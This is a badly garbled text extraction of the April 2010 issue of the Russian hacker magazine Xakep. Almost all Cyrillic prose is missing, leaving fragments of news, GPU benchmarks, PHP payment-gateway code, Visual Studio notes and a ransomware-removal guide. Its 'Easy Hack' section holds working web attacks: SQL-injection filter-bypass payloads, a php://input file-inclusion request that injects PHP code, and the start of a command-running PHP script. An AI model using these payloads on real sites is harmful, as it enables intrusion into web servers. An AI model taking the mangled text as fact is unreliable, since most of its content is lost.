Хакер 2010 04 PDF

x 04 () 2010
.
210
:

SHAREWARE- SYMBIAN . 102
04 (135) 2010
DEP

HARDWARE-DEP
. 68
.NET REMOTING:

GRID-
CAPTCHA:
. 96

. 44
ACTIVEX
135

. 58
LINUX ?
. 90
http://group.xakep.ru
INTRO
: http://group.xakep.ru.
,
, ,
,

.
: -
6
, .
,

.
:

,
.
, : http://group.xakep.ru
, nikitozz
CONTENT
MegaNews
004
080
084
090
Ferrum
016
PC_ZONE
020
025
026
030
ACM ICPC: ,
Visual Studio 2010

GNU Screen tmux

Linux -
096
099
.NET
102
.NET Remoting:
grid-
.NET Framework

Shareware- Symbian
034
Easy-Hack
106
038
SYN/ACK
044
CAPTCHA:
110
050
Unserialize
115
054
120
IN DA FOCUS
058
122
064
128
068
DEP
074
X-Tools
ActiveX
Error-based SQL-Injection
hardware-DEP
C#
CFEngine 2
VPN
134
PSYCHO:
140
FAQ UNITED
076
143
144
WWW2
002
2010
:
-
FAQ
8.5
web-
X 04 /135/ 10
026
Visual Studio 2010
044
CAPTCHA:

068
DEP

hardware-DEP
128
VPN
/
>
nikitozz
(nikitoz@real.xakep.ru)
>
gorl
(gorlum@real.xakep.ru)
>
Forb
(forb@real.xakep.ru)
PC_ZONE UNITS
step
(step@real.xakep.ru)
UNIXOID, SYN\ACK PSYCHO
Andrushock
(andrushock@real.xakep.ru)
Dr. Klouniz
(alexander@real.xakep.ru)
>

(bergman@gameland.ru)
> xakep.ru
(xa@real.xakep.ru)
/ART
>-

(novikov.e@gameland.ru)
>

(svetlyh@gameland.ru)
/DVD
>
Step
(step@real.xakep.ru)
X 04 /135/ 10
> Unix-
Ant
>

/PUBLISHING
>
, 119021, , .
, . 11, . 44-45
.: +7 (495) 935-7034
: +7 (495) 780-8824
>

>

>

>

>

>

>PR-

>

>

>

/ .: (495) 935-7034, : (495) 780-8824

> GAMES & DIGITAL
(goryacheva@gameland.ru)
090

Linux
-
>

> Gameland TV

>
(strekneva@gameland.ru)
>

>

>
(ashomko@gameland.ru)
> -

>

(korenfeld@gameland.ru)
>

>
(andrey@gameland.ru)
>
(devald@gameland.ru)
>
(kosheleva@gameland.ru )
>

(goncharova@gameland.ru)
.: (495) 935.70.34
: (495) 780.88.24
>
.: 8 (800) 200.3.999

>
101000, ,
, / 652,

,

77-11802 14
2002 .

Lietuvas Rivas, .
100 000 .
.

. :

. ,

,
.
.

.
.

:
content@gameland.ru
, , 2009
003
MEGANEWS
MIFRILL
MARIA.NEFEDOVA@GLC.RU
MEGANEWS

- ,

, ,
. Cleankeys Touch Sensitive
Cleankeys Inc. , ,
, ,
. Cleankeys Touch Sensitive
, ,
!
, , ,
. , , ,
, $450
$400 , - .
,
. ,
. ,

.
GOOGLE WIKIMEDIA
FOUNDATION.
004

, -
,
. :

Virus Total (www.virustotal.
com) 20 10
. ,
.
, ,

, Virus Total.
,
10
10
14
,
. Virus Total
Hispasec Sistemas,
,
, ,
. ,
Virus Total ,

. ,
, , ,

,
.
X 04 /135/ 10
MEGANEWS
NOKIA.
?

AMAZON KINDLE

3
.
Maemo,

, Nokia
. , , Nokia
Intel ,
MeeGo,
, ,
.
,
: Moblin (Mobile Linux) Maemo,

. , MeeGo
Symbian,

, , ,
Nokia N900.
Linux
kernel.org ,
, .

Qt,

Nokia. , MeeGo
.
THE PIRATE BAY

, ,

torrents.ru!
, ,
, rutracker.
org, , .
, :
torrents.ru -
.
26

AutoCAD Autodesk.
,
1,5 .
torrents.ru
, ,
( , )
-
,

.
,
Autodesk, 1, ,
,
,

. ,
torrents.ru
,
, ,
.

-
EKinoT.ru, IT eBay,
Twitter, Cisco Systems, Howcast, Edventure,
Social Gaming Network Mozilla,
.
, , Twitter
, , Catalys.
? ? ,
Dreamtorrent ( torrents.ru) -,
,
,
-.

,
,
.
: .ru . torrents.ru :

Cherokee (www.cherokee-project.
com) -, ,
,
HTTP-.
.
TWITTER : 1
, 17%.
006
X 04 /135/ 10
MEGANEWS
16- , 10

. , ?
Cyber ShockWave Bipartisan
Policy Center.
, CNN.
: -
,
, , -

,
. , , .
,
, ,
. .
, :
:).
STRATEGY ANALYTICS , 2016

90% .
,
, , ? ,
! : ? ,
!
Digital Access. 26 Digital Access ivi.
ru, 9.000
, , - , . .
?, , , ,
. , vs . ivi.ru :
uravo.tv, 30- .
Rambler , ,
. , , Digital Access
, 2011
20% .,
.
:

44- .
, ,
, eBay
, , 16 . ,
, . , ,
,
, . ,
eBay ,
- PayPal, , ,
, .
, . ,
- (, - )
, , : .
, :
, , ! eBay, ,
,
. .
008
X 04 /135/ 10
009
MEGANEWS

,

24 .
The Pirate Bay , Flattr . ,

, , ,
,
, , . :
Flattr , , $10. , , , - Flattr-.
, Flattr-,
. , . ,
, ,
, . , Flattr-, , ,
. , 10 ,
$1, 100 $0,1. , .
.
NVIDIA OPTIMUS
NVIDIA: ,
. NVIDIA Optimus ,
. NVIDIA
, . , NVIDIA
Optimus , , ,
ASUS UL50Vf, N61Jv, N71Jv, N82Jv U30Jc.

USB 3.0
USB 3.0 SATA 6 /
,
,
, . ,
,

?
GA-USB3.0 Gigabite.
PCI-Express x1
USB 3.0. GA-USB3.0
Molex,
.
$40.
010
X 04 /135/ 10
11
MEGANEWS
RADEON HD 5830
AMD 3D
ATI Radeon HD 5830,
,

Gigabyte, Sapphire,
XFX . ,
AMD . ATI Radeon HD
5830

5770 5850. ATI Radeon HD
5800 $240.
:
40- Cypress
1120 ,
56 1 GDDR5.
800 4000
. ATI Radeon HD 5830
DirectX 11, ATI Eyefinity, CrossFireX ATI Stream.
,
,
Radeon HD 5830 .
,

- ,
Globalscale GuruPlug Server. . 99
,
ARM: Marvell KirkWoord 1.2 , 512 DDR2 800 ,
802.11g, Bluetooth-,
Ethernet, 2 USB2.0, .
ARM- Debian
2.6.32, , , . Ethernet eSATA,
PLUS 30 . www.
globalscaletechnologies.com , ,
shipito.com,
. , ,
: 5
175 .
Black Hawk Safety Net

(3800hk.com), . ,
, , , 12000
. 12000 VIP-
650000 .
, , . , ,
.
WIMAX FORUM,
WIMAX
620 .
, 2011
1 .
012
X 04 /135/ 10
PWN2OWN 2010

500000 !
:
3- .
X 04 /135/ 10
Google
Chrome $1337,
Pwn2Own, security- CanSecWest , .

4- ,

$100000. $40000,

(Microsoft Internet Explorer,
Mozilla Firefox, Google Chrome,
Apple Safari),
(XP Vista, Windows
7, Mac OS X Snow Leopard).

-
.
Apple iPhone
3GS, RIM Blackberry Bold 9700,
Nokia Symbian
S60 (, E62),
Motorola
Google Android.

.
,

Safari, Firefox
Internet Explorer 8,

(
Nils ),

. ?
013
13
MEGANEWS
, ,

pleaserobme.com ( ,
)
.
,

,
.
:
-

Twitter. ,
,
.
,

.
SCANSAFE , 2009
80%

PDF-.
GSM ,
4G
19 1710-1785 1805-1885
GSM .
, ,
. , , .
, .
, Delta, Air France, Lufthansa, Emirates .
15
LTE (Long Term
Evolution) . CDMA/UMTS
326,4 / , 172,8 / .
: WiMax vs. LTE,
, .
LTE 2009 .

-,
, .
: -, ,
,
. Symantec , ,
. Live PC Care
! , , ,
.
,
,
( $30100).
.
014
X 04 /135/ 10
Y2K , 10
- PlayStation 3
,
. Y2k,
?
, PS3. -
28 1
2010 PlayStation 3
( Slim- ), , (
) PlayStation
Network. PSN
: An error
has occurred. You have been signed out of PlayStation
Network (8001050F)
, Failed to install
trophies. Please exit your game.
1 2000 (
). Sony 2010 ,
. ,
29 1 .
, 24
, . ,

Zeus
. SpyEye
2009,
. Zeus,

.

-,
(C&C) .
, (1.0.7) Kill Zeus. SpyEye
Windows API
HttpSendRequestA,
Zeus . ,
SpyEye,
Zeus,
, Zeus C&C-
(,
) , , .
Zeus.
X 04 /135/ 10
015
Sapphire
Radeon HD 4650
FERRUM

Sapphire
Radeon HD
4650
Sapphire
Radeon HD 5750
Palit GeForce
GT 220 Sonic
Palit GeForce
GT 220 Sonic
apphire
on HD 5750
Palit GeForce
GT 220
Sapphire
Radeon HD
4670
Palit
GeForce GT
240 Sonic
.
.

, .
, , ? ,
.
, .
NVIDIA ATI,
, , low-end .
. ATI ,
NVIDIA CUDA PhysX, ,
. , ATI Stream,
CUDA. , , ATI ( ,
).
. NVIDIA 512 ,
ATI 256- . ,
GDDR5,
.
. NVIDIA 55 -, ATI 40 . , NVIDIA
40 .

, , . ,
. ,
, . 3DMark 2003,
Red Faction: Guerrilla, Resident Evil 5 Batman: Arkham Asylum.
, ,
16801050 , ,
016
:
PALIT GEFORCE GT 220
PALIT GEFORCE GT 220 SONIC
PALIT GEFORCE GT 240 SONIC
SAPPHIRE RADEON HD 4650
SAPPHIRE RADEON HD 4670 ULTIMATE
SAPPHIRE RADEON HD 5750
. Red Faction: Guerrilla 12801024 , .
,
,
, .
BATMAN: ARKHAM ASYLUM, FPS

Palit GeForce GT 240 Sonic
Palit GeForce GT 220
Sapphire Radeon HD 5750
0
10
20
30
40
50
60
70
80
NVIDIA
X 04 /135/ 10
e
Palit GeForce
GT 220 Sonic

Palit GeForce
GT 220 Sonic
0
50
GPU,
,
Sapphire
Radeon HD 5750
PALIT GEFORCE
GT 220
1800 .
:
, : 40
, : 635
, : 800
: DDR2
, : 512
, : 128
: PCI EXPRESS 2.0
DIRECTX: 10.1
NVIDIA GeForce GT 220. ,

,
, , PCI-E. ,
DVI HDMI VGA, ,
, , .
Palit 10 . , , .

, 51 ..
DDR2 , ,
,
. .
, .
X 04 /135/ 10
100
Palit
GeForce GT
240 Sonic
Palit GeForce
GT 220 Sonic
Sapphire
Radeon HD 5750
PALIT GEFORCE
GT 220 SONIC
:
, : 40
, : 650
, : 900
: GDDR3
, : 512
, : 128
: PCI EXPRESS 2.0
DIRECTX: 10.1
2000 .
Sonic .
,
Palit GeForce GT 220. -,
GDDR3,
, .
-, 10 650 900
, ( , 625
790 ). ,
, Palit
. , , 128- 1 -,
. VGA, HDMI DVI. ,
.
.
,
.
017
FERRUM
RESIDENT EVIL 5, FPS

0.00000 5.00000 10.00000 15.00000 20.00000 25.00000
- Batman: Arkham, Asylum, FPS/..

- Resident Evil5, FPS/..
- Red Faction: Guema, FPS/..
10
20
30
PALIT GEFORCE
GT 240 Sonic
SAPPHIRE RADEON
HD 4650
3500 .
NVIDIA
. , GDDR5,

. Sonic ( 95 ) ( 35 ), . ,
ATI Radeon Sapphire Radeon HD 5750.
,
,
.
, ,
, ,
- .
018
50
60
70
80
, : 40
, : 585
, : 945
: GDDR5
, : 1024
, : 128
: PCI EXPRESS 2.0
DIRECTX: 10.1
40
, : 55
, : 600
, : 700
: GDDR3
, : 512
, : 128
: PCI EXPRESS 2.0
DIRECTX: 10.1
1700 .
, ,
, , .
low-end,
. , , ,
Sapphire Radeon HD 4650 . HDMI, VGA
DVI, . .
, . , ,
Red Faction: Guerrilla.

. , ,
, , .
X 04 /135/ 10
RED FACTION: GUERRILLA, FPS
3DMARK 2003,

0
10
15
20
25
30

Sapphire Radeon HD
5750
10000
20000
40000
50000
.
,
Sapphire Radeon HD
5750
.
SAPPHIRE RADEON
HD 4670 Ultimate
SAPPHIRE RADEON
HD 5750
, : 55
, : 750
, : 873
: GDDR3
, : 512
, : 128
: PCI EXPRESS 2.0
DIRECTX: 10.1
30000
3100 .
, : 40
, : 700
, : 1150
: GDDR-5
, : 1024
, : 128
: PCI EXPRESS 2.0
DIRECTX: 11
5700 .
,
. - , , Sapphire
Radeon HD 4670 Ultimate, ,
.
, ,
. .
, ,
.
.
, ,
,
DirectX 11. , ,
,
, . ,
, . ,
.
, ( ). , -
, ,
.
, , ,
. ,
.
, ,
-
X 04 /135/ 10
. , ,
.
Sapphire Radeon
HD 5750,
, .
..z
019
PC_ZONE
gurza brain@bidiko.ru

! , !
, . -,
? ?
? .
,

Webmoney. , ,
: ,
. ,
. , ,
,
.
,

.
, ,
. , , ,
, . :

,
.
,
? , .

( PDF- ),
, SMS.
Robokassa'
(www.robokassa.ru), -
020
. ,

,
- ,
, ,
- ,
.

,

.
(.,
Webmoney )? !
SMS? .

.
,
? , 9 . .

,
5% .
, .

,
! , , , PHP (+ curl)
jQuery,

ROBOKASSA
-,
PHP,
.
RoboKassa
API-.
,

. , :
PHP, Perl , ,
ASP Python .

HTTP- GET
POST URL https://merchant.
roboxchange.com.
. RoboKassa :
1. URL RoboKassa,

,
.
2. RoboKassa
,
.
. -, , RoboKassa,
X 04 /135/ 10
: bidiko.ru/test/xa/payments.php?item=1
, ,

.
3. RoboKassa
Result- .
, URL- Fail (
,
),
Success (

). URL- Result- Success, Fail RoboKassa
.
:
1.
URL-,
:
//
$inv_id = 0;
//
$shp_item = $item;
$shp_user = 'TestUser';
//
$crc = md5("$mrh_login:$out_
summ:$inv_id:$mrh_pass1:Shp_
item=$shp_item:Shp_user=$shp_
user");
// URL
$url = "https://merchant.
roboxchange.com/Index.
aspx?MrchLogin=$mrh_
login&OutSum=$out_summ&InvId=$inv_
id&Desc=$inv_desc&Shp_
item=$shp_item&Shp_user=$shp_
user&SignatureValue=$crc";
,
GET.
MrchLogin
X 04 /135/ 10
ajax- XML
RoboKassa. demo.
OutSum /
.
InvId .
,
.
,

(
RoboKassa),
.
Desc /,
, ,
URL.
Shp_item, Shp_
user :
Shp_item .
Shp_user
(, ).
,
(InvId),
RoboKassa
, ,
, /.
,
, SignatureValue
, - md5 "$mrh_
login:$out_summ:$inv_id:$mrh_pass1:Shp_
item=$shp_item:Shp_user=$shp_user".
,
$mrh_pass1 .
,
RoboKassa. ,
.
2. , ,
URL.

.
3.

, Result-, : -,
, -,
(
) ,
. ,
Bad sign, OK<% %>.

Result-.
//
$out_summ = $_REQUEST["OutSum"];
$inv_id = $_REQUEST["InvId"];
$shp_item = $_REQUEST["Shp_item"];
$shp_user = $_REQUEST["Shp_user"];
$crc = $_REQUEST[
"SignatureValue"];
$crc = strtoupper($crc);
//
$my_crc = strtoupper(md5("$out_
summ:$inv_id:$mrh_pass2:Shp_
item=$shp_item:Shp_user=$shp_
user"));
,
Result-, -.
, , ,
.
,
API- RoboKassa, -
021
PC_ZONE

.
.

, .
1. , (
, ,
..). ,
.
,

.
2.

.
,
,
.

.
,
,
ajax-,
( ,
) ,
.
curl:
,
.

payments.php.
$item
/ (
),
GET. payments.php
, ( )
022
. payments.php.
<?php
// item
// item
//
?>
<div id="xmlConsole">
//
</div>
<div id="pay_systems">
//"" /

<table class="pay_table">
//
</table>
</div>
payments.php (

)
,
switch.
,
,
, .
,
,
.

.
: ,
(,
),

.

, .

,
. Result-

"bad sign", ,
/ , , .
2
RoboKassa,

RoboKassa, ,
.
, ,
RoboKassa,
email. ,
-
! RoboKassa,
URL
.
pay_table.

: ,
:
: <b id="PayCode"></b>
<b>.</b>
PayCode .
, . PCR.

,
URL ( $url)
.
,

,
$url .
<a href="<?php echo
$url.'&IncCurrLabel=PCR'; ?>"></
a>

,
.
XML-
ROBOKASSA JQUERY

,

.
XML- RoboKassa.

XML- POST www.
roboxchange.com/xml/rate.asp.
:
X 04 /135/ 10
RK
<robox.rate.req>
<out_curr>OUTCURR</out_curr>
<merchant_login>LOGIN</
merchant_login>
<out_cnt>CNT</out_cnt>
</robox.rate.req>
OUTCURR
(
RoboKassa), LOGIN
, CNT
.
XML- RoboKassa
<robox.rate.resp>
<retval>nRetCode</retval>
<out_curr>sOutCurrLabel</out_curr>
<out_cnt>nOutCount</out_cnt>
<date>sDateODBC120</date>
<ratelist>
<rate>
<in_curr>sIncCurrLabel</in_curr>
<in_curr_name>
sIncCurrName
</in_curr_name>
<value>nValuet</value>
<ins_per_Xout>nInCount
</ins_per_Xout>
</rate>
</ratelist>
</robox.rate.resp>
: nRetCode , 0 , (
.
RoboKassa www.robokassa.ru/Doc/Ru/
Interface.aspx);
sOutCurrLabel
;
nOutCount
;
sDateODBC120 , ( "yyyy-mm-dd
hh:mm:ss", GMT);
<rate> , ,
X 04 /135/ 10
RoboKassa.
<rate>
in_curr ,
payments.php PayCode;
ins_per_Xout, ,
, ,
,
.
, XML- RoboKassa,
jQuery ( rk_xml_int.js).
ajax().
function getXML(url, cnt){
$.ajax({
url: url,
type: 'POST',
dataType: 'xml',
data: {cnt: cnt},
beforeSend: xmlStart,
success: xmlSuccess,
error: xmlError,
complete: xmlComplete
});
}
getXML() .
url
URL-,
. cnt
. ,
ajax(),
, xmlStart, xmlSuccess, xmlError,
xmlComplete, . . ,
url ,
.
PHP- XMLHTTPREQUEST
ajax() jQuery API-

XMLHttpRequest.
XMLHttpRequest HTTP, .

XSS-, XMLHttpRequest
.
, script.js,
serv1.com,
serv2.com
XMLHttpRequest.

- rk_rate_proxy.php.
: rk_xml_
int.js XMLHttpRequest
XML- rk_rate_proxy.php (
),
curl XML RoboKassa,
. .
XML- curl
:
curl_setopt($ch, CURLOPT_URL,
$url);
curl_setopt($ch, CURLOPT_
RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT,
20);
POSTFIELDS, $request);
HTTPHEADER, array('Connection:
close'));
$url XML-
RoboKassa,
rk_rate_proxy.php. $request
, , XML-,
:
$request = '<robox.rate.req>';
$request .= '<out_curr>RUR</
out_curr>';
$request .= '<merchant_
login>demo</merchant_login>';
$request .= '<out_
cnt>'.$cnt.'</out_cnt>';
$request .= '</robox.rate.req>';

demo.
curl ,
. ,

023
PC_ZONE
xmlError(), , XML-
.
div-""
.
function xmlError(xhrInstance, message,
optional) {
$("#xmlConsole").html('<h2>
<font color="red">!</font>
</h2>');
$("#pay_systems").css(
'display', 'none');
}
XML-
xmlComplete(),
id=xmlConsole CSS- ajaxLoaderCSS,
xmlSuccess(),
parseXML() XML-.
parseXML()
jQuery JavaScript, .
DVD
dvd

$result = curl_exec($ch);
header('Content-type: text/xml');
echo $result;
, PHP- rk_rate_proxy.php .
.
Ajax- ,
XMLHttpRequest ,
. ,
ajax().
. xmlStart()
XML-.
CSS- div id=xmlConsole.
ajaxLoaderCSS
. - www.ajaxload.info,

. xmlStart()
.
function xmlStart(xhrInstance) {
$("#xmlConsole").
addClass("ajaxLoaderCSS");
}
024
function parseXML(xml){
// <rate>

$( xml ).find('rate').each(function(){
//
var curr =$(this).find('in_curr').text();
//
var val = $(this).find('ins_per_Xout').
text();
// -
$('#'+curr).html(val);
});
}
. XML-,
payments.php
<script type="text/javascript">
$(function() {
<?php
$tmp_out_summ = (int) $out_summ;
echo "getXML('rk_rate_proxy.php',
$tmp_out_summ);";
?>
});
</script>
getXML() ,
, DOM-
.
.

, . ? !
. , , ,
.
. . z
X 04 /135/ 10
S TEP T W I T T E R . C O M / S T E PA H

ACM ICPC: c , ,,

ACM-ICPC,
IBM, . ,
, : ,
. IBM :
, , . ?!
- ,
. ,

, .
, 30
. ACMICPC
.
: -
,
, .
(, ,
)
. ,
- IBM
, . -
: !
, , .
103
.
( , ), - .
20 .
, ,
ACM ICPC ,
.
,
, ,
. 11
. 18
. , ,

. ?
: . !
. , , ,
5 , 11
.
,

X 04 /135/ 10
ACM ICPC
, .
, , ,
,
IBM Smarter Planet ( )
, ,
,
,
,

. ,

,
,

.
. , , ,
,
.

C, C++ Java
.
,

,
.
,
. ,
,
,
, .
? , .
30
,
.
,
.
. , -
: , ?
? ,

three, two, one . ,
. ,
.
: ACM-ICPC
, .
: , ()
- ().
. , ,
. z
025
PC_ZONE
i-vizaik@microsoft.com

?
Visual Studio 2010

VISUAL STUDIO 97 . MICROSOFT ,

. VISUAL STUDIO 2010.
MICROSOFT ,
.
,
,
, Visual Studio
2010
12 2010.
:).

2009 . ,
,

. , ,

.
?
! ,

.
,
.
UI
(IDE Integrated
Development Environment) ,
, . :

026
Windows Presentation Foundation (WPF).

,

. ,
,
, .

.
,
VS
, IDE
:). ,
, MS
.

,

.

,
,
.
,
WPF,

.
,
,
,
.

.
Visual Studio 2010 :
.
:
,
.
,

.
, ,
Visual Studio
, 2010

. ,
Call Hierarchy ( )
(" ?", "
") ,
.
Find All References.
, X 04 /135/ 10
IDE

Visual Studio 2010
Call Hierarchy
, .
,
,
,
.

. Visual Studio 2010

, ,
.
, Navigate
To ( ,
CTRL+)
level-up
,
. ,

.
, ,
,
.
,
.
, .
. :

, (private). ,

X 04 /135/ 10
, , , . , SHIFT+ALT ( )
,
, ,
.
.

, ,
\\.
-
( code snippets) HTML
JavaScript.
,
, . Visual Studio 2010
.

.

. Watch:

,
.
,
,
,
. .
, , ,
.
,
.
IntelliTrace,
.

:
.
: , , , : ,
,
, !

:
,
, . , ,
,
,
,
, ,
, .
,

.

? :
. ,

.NET Framework 4,
Visual Studio 2010,
,

.
.
027
PC_ZONE
.NET FRAMEWORK 4

(deadlock).
:
, (),
.

Visual Studio 2010 : (Parallel Stacks)
(Parallel Tasks).
,
. ,
,
, :
.

: ,
.
,
,

.
, , ,
028
, ,
.
,

Visual Studio
2010 .
,

:
(Concurrency
Profiling),

,
.
, , .
Tier Interaction Profiler.

,
. -,

, . ,
ASP.NET -
Visual
Studio 2010 .NET
Framework 4,
. , ,
:

.
: BigInteger
Complex.
. ,

,
.
.NET Framework
Managed Extensibility Framework (MEF)

().

, .
,
MEF.
Visual Studio 2010.
, .NET Framework
4
.
System.Threading.
, WPF
:
DataGrid, Calendar DataPicker, ,
.
JavaScript Internet
Explorer 8.
,
,
, ,

.

, ,

,

-. ,

,
.
X 04 /135/ 10
RESHARPER?
INFO
Visual Studio
2010 JetBrains ReSharper (www.
jetbrains.com).
, , -.
, ReSharper, Visual Studio 2010, C# 4 VB10,
ASP.NET
ASP.NET MVC.
,
, LINQ
,
.
,
,
,
.
info

Microsoft

i-vizaik@
microsoft.com
IntelliTrace
,
.
:
,
.
C# VB ,
,
. -
Microsoft Excel,
Basic, .
Visual Studio 2010

.
? !
- ,
RC . ,

Visual Studio ,
.
.
,
IDE,
.z
Navigate To
EXPRESS- !
Visual Studio 2010

.
: Ultimate, Premium,
Professional Express. Visual Studio
2010, : .
, -
VS!

, -
, ExpressX 04 /135/ 10
029
PC_ZONE
Step twiter.com/stepah

!
xakep 31337.
SMS, ,
, , Microsoft , , , , . .
Trojan.Winlock ,
, ,
.

(
Ransomware ransom,
), ,
SMS . , :
,
Microsoft
,
, ,
,

SMS.

(, , ,
030
),
, ,
, , .
,
,
,
SMS .
-

. ,
,
, . , , ,
, .
, , , .
TDL3,
. ,
( , ,
). ,
,

( ).
,
, , ,
, , .
,

, ?
, .
- ,
.

, .
1. , ,
.
,

,
.
X 04 /135/ 10
Dr.Web
wmic
(WMI Command-line),
,

:
wmic /NODE:<
> ( /
NODE:192.168.1.12) /USER:<
>
(, /USER:yastep)
,
. process. ,
.
:

delete:
process where name="< >" delete

, , .
2. Windows XP/2000,
<WIN-U>
,

.
- ,
,
.
3. ,

,
.
LiveCD.
,
,
ERD Commander.
,

: 5.0 Windows XP, 6.0 Windows
Vista, 6.5 Windows 7/Server 2008 R2.
X 04 /135/ 10

,
.
rescue-
LiveCD ,
: Dr.Web LiveCD
(www.freedrweb.com/livecd) Kaspersky
Rescue Disk (devbuilds.kaspersky-labs.com/
devbuilds/RescueDisk).
4. ,
,
. ,
, ,
,
, ,
, .
,

,
, , ,
.
,
. ,
,
,
, ,
SMS .

:
:
support.kaspersky.ru/viruses/deblocker;
Dr.Web:
http://www.drweb.com/unlocker/index;
Eset: www.esetnod32.ru/.support/winlock.

RansomHide (http://softget.
net/freeware/projects/RansomHide/ransomhide.
exe). SMS
,

. ,
- ,
.

, ,
. ,
(
,
, Hijackthis, Autoruns OSAM).
,
, .
HKLM\SOFTWARE\
Microsoft\Windows NT\CurrentVersion\Winlogon\
userinit, , Winlogon ,
. , Winlogon
Userinit.exe,
logon-,
,
Explorer.exe, ..
Windows. Userinit.exe
- ,
, Windows
Explorer, , ,
.
,
:
Userinit = %systemfolder%\
userinet.exe, [ ]
. ,
tmp,
Windows.
,
%systemfolder%\userinit.exe.

- shell ( , userinit),
explorer.exe
.
,
,
. ,

, .
NTFS? .
streams (technet.microsoft.
com/en-us/sysinternals/bb897440.aspx)
, : "streams.exe
-d -s c:\".

, -
031
PC_ZONE

Hijackthis
(
,
), ,
( ):
Kaspersky Virus Removal Tool (avptool.
virusinfo.info) , ,
. ,
.
,
.
Dr.Web CureIt! (www.freedrweb.com/cureit)
,
,
.
,
.
,
,
, ,

- :
AVZ (www.z-oleg.com/secur/avz) , ,
, .
-
AVZ

032

. AVZ
,
,
,
. ,

API-.
HijackThis (free.antivirus.com/hijackthis)
, AVZ, ,
, .
,

.

security-,
,
virusinfo.info.
, AVZ/HijackThis,

-, AVZ.

, AVZ
-> /
-
! virusinfo.info
!
virusinfo.info.
, , DLL-,
Internet Explorer , .
HTML,

,
,
.
LiveCD Dr.Web
80
ERD
Commander
,
,
, , ,
. ,
.

HKEY_CURRENT_
USER,
, HKEY_LOCAL_
MACHINE,
.
, . ,
DisableRegedit DisableRegistryTools:
X 04 /135/ 10
SMS-,
SMS ?
SMS .
, .
Google' sms , . ,
, , - , Google , .
, , .
, .
, : , , . .
, , , SMS , ,
( ),
. , , , , .
, . , . , : SMS
, SMS
.
reg add HKLM\Software\Microsoft\Windows\

CurrentVersion\Policies\System /v
DisableRegedit /t REG_DWORD /d 0
reg add HKCU\Software\Microsoft\Windows\
DisableRegedit /t REG_DWORD /d 0
reg add HKCU\Software\Microsoft\Windows\
DisableRegistryTools /t REG_DWORD /d 0
.
exe-,
reg- :
Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\exefile\shell]
[HKEY_CLASSES_ROOT\exefile\shell\open]
"EditFlags"=hex:00,00,00,00
[HKEY_CLASSES_ROOT\exefile\shell\open\
command]
@="\"%1\ %*"
[HKEY_CLASSES_ROOT\exefile\shell\runas]
[HKEY_CLASSES_ROOT\exefile\shell\runas\
command]
@="\"%1\ %*"
,
.
(,
regedit.exe) HKLM\SOFTWARE\
Microsoft\Windows NT\CurrentVersion\Image File Execution
Options.
,
,
Debugger.
, X 04 /135/ 10
.
:
REG DELETE HKEY_LOCAL_MACHINE\SOFTWARE\
Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\regedit.exe"
INFO
info
, ,
ProcessExplorer
HKEY_LOCAL_MACHINE\SOFTWARE\
,
Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths.
, , -
. .
,
exe -
DisableTaskMgr. reg-:
,
[HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Policies\System]
,
"DisableTaskMgr"=dword:0
-

.
,
, . popup
SMS . ,
,
Internex Explore
Firefox'. ,
, . Internet Explorer
>
> ,
Firefox'
> .z
033

Spyder spyder@antichat.net
Cr@wler crawler@xakep.ru
Easy Hack
1
: SQL-INJECTION
:
, ,
, . , ,
,
.
%09
%0A
%0B
%0C
%0D
horizontal tab,
NL line feed,
vertical tab,
NP form feed,
carriage return,
. :
id=-1%0Aunion%0Aselect%0A1
C , , , :
<?php
if(isset($_GET['id']) && $_GET['id']!=''){
if(strstr($_GET['id'],"") {die "HACK ALERT"};
if(strstr($_GET['id'],"/**/") {die "HACK ALERT"};
if(strstr($_GET['id'],"+") {die "HACK ALERT"};
if(strstr($_GET['id'],"%20") {die "HACK ALERT"};
- $_GET[id]
, "", /**/, + %20

.
, ,
SQL , MySQL.
1. , .
, , . (
;)) :
: OPENVPN

:
OpenVPN
, . , ,
whoami root, : :) ?.
VPN-.
1. tun: modprobe tap && lsmod |
grep tap
2. , OpenVPN.
C lzo,
: locate lzo.so
3. , ,
. - ,
. (
, )
linux.
tar xzvf lzo.tgz
cd lzo
./configure
034
2. MySQL SQL- ,
:
select id/*!,title*/ from news
news id title. , :
id=-1/*!union*/select/*!version()*/
, .
, .
:
id=(-1)union(select(version()))
make
make install
4. , lzo , openvpn
lzo:
tar xzvf vpn.tgz
cd vbb
./configure
make
make install
5. .
. /etc/openvpn/,
openvpn easy-rsa sample-config-files
/etc/openvpn/easy-rsa :
./vars ( )
./clean-all (
keys )
./build-ca ( )
./build-key-server server ( X.509 )
X 04 /135/ 10
./build-key-pkcs12 client ( X.509 )
Common name
. client, server.
6. ,
./build-dh
7. , .
touch /etc/openvpn/server.conf

OpenVPN
port 443
proto tcp
dev tap
cipher DES-EDE3-CBC
reneg-sec 60
ca /etc/openvpn/easy-rsa/keys/ca.crt
cert /etc/openvpn/easy-rsa/keys/server.crt
key /etc/openvpn/easy-rsa/keys/server.key
dh /etc/openvpn/easy-rsa/keys/dh2048.pem
server 10.10.200.0 255.255.255.0
client-config-dir ccd
push "dhcp-option DNS 222.222.222.222"
push "dhcp-option DNS 22.22.222.222"
push "redirect-gateway"
keepalive 10 120
persist-key
persist-tun
comp-lzo
verb 0
8. ip- iptables:
: PHP-

:
2004 SecurityLab , php-
php://input. , .
, , :
<?php
if(isset($_GET['page'])) {include($_GET['page']);}
page php://input: http://www.

example.com/index.php?page=php://input.
,
POST. , POST , include
.
.
1. PHP- POST:
POST /index.php?page=php://input HTTP/1.1
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X 04 /135/ 10
echo 1 > /proc/sys/net/ipv4/ip_forward

iptables -t nat -A POSTROUTING -s 10.10.200.0/24 -j SNAT --to
127.0.0.1
127.0.0.1 ip , VPN
9. vpn/sample-scripts openvpn.init - ( , init) /etc/init.d/

:
/etc/init.d/init start
10. , .
, :). OpenVPN -
, ,
.
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;

MyIE2)
Host: www.example.com
Connection: Keep-Alive
Cache-Control: no-cache
<?php phpinfo() ?>
phpinfo().
2. PHP- .
<?php
if (isset($_GET['cmd']) && isset($_GET['host']) && isset($_
GET['script'])) {
$host = stripslashes(@$_GET['host']);
$script = stripslashes(@$_GET['script']);
$cmd = htmlspecialchars_decode(stripslashes(@$_
GET['cmd']));
